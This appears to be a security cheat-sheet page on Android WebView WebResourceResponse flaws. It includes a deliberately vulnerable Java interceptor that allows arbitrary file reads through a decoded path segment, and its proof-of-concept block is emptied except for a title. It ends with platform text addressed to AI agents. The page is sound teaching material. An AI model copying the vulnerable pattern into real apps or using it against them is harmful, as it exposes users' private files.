Evil page

> For the complete documentation index, see [llms.txt](https://0xn3va.gitbook.io/cheat-sheets/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xn3va.gitbook.io/cheat-sheets/android-application/webview-vulnerabilities/web-resource-response-vulnerabilities.md). # WebResourceResponse Vulnerabilities ## WebResourceResponse overview [WebResourceResponse](https://developer.android.com/reference/android/webkit/WebResourceResponse) is a class that allows an Android application to emulate the server within WebView by intercepting requests and returning arbitrary content (including a status code, content type, content encoding, headers and the response body) from the application's code itself without making any actual requests to the server. ## Security issues ### Access to arbitrary files If you control a path of the returned file and have a XSS or the ability to open arbitrary links inside a WebView, you can gain access to arbitrary files via XHR requests. For example, if there is the following `WebResourceResponse` implementation: ```java WebView webView = findViewById(R.id.webView); webView.setWebViewClient(new WebViewClient() { public WebResourceResponse shouldInterceptRequest(WebView view, WebResourceRequest request) { Uri uri = request.getUrl(); if (uri.getPath().startsWith("/local_cache/")) { File cacheFile = new File(getCacheDir(), uri.getLastPathSegment()); if (cacheFile.exists()) { InputStream inputStream; try { inputStream = new FileInputStream(cacheFile); } catch (IOException e) { return null; } Map headers = new HashMap<>(); headers.put("Access-Control-Allow-Origin", "*"); return new WebResourceResponse("text/html", "utf-8", 200, "OK", headers, inputStream); } } return super.shouldInterceptRequest(view, request); } }); ``` The PoC for the attack may look like the following one: ```html Evil page ``` In the above example, the attack is possible because the `Uri.getLastPathSegment()` returns a decoded value that is used to generate the file path within the `new File(getCacheDir(), uri.getLastPathSegment())` line. Policies like CORS still work inside a WebView. Therefore, requests to the `any.domain` are not allowed without the `Access-Control-Allow-Origin: *` header. However, this restriction does not affect this PoC since the `WebResourceResponse` implementation checks uses only the URL path and you can replace `any.domain` with the current origin. References: * [Writeup: Amazon Shopping and Amazon India Online Shopping apps: Access arbitrary files owned by Amazon apps](https://blog.oversecured.com/Android-Exploring-vulnerabilities-in-WebResourceResponse/#an-overview-of-the-vulnerability-in-amazon%E2%80%99s-apps) ## References * [Android: Exploring vulnerabilities in WebResourceResponse](https://blog.oversecured.com/Android-Exploring-vulnerabilities-in-WebResourceResponse/) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xn3va.gitbook.io/cheat-sheets/android-application/webview-vulnerabilities/web-resource-response-vulnerabilities.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.